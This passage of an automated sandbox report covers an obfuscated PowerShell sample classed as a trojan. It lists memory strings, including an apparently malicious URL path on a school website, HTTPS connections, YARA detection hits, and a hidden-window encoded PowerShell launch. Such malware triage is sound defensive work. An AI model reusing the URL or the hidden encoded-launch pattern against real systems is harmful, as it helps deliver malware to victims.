Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.au
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.aux
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://www.tutorialrepublic.com/examples/images/clients/1.jpg
Source: A69S.dll.2.drString found in binary or memory: https://www.tutorialrepublic.com/examples/images/clients/3.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/channel/UCezyOaog07qIo-EMB_zABkw?view_as=subscriber
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 35.214.199.246:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.223.27:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.204.98.64:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

System Summary:

Very long command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 5429
Source: ps_script.ps1, type: SAMPLE | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engine | Classification label: mal100.troj.evad.winPS1@4/15@9/7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210518
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoooqw21.rs0.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: ps_script.ps1 | Virustotal: Detection: 8%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation: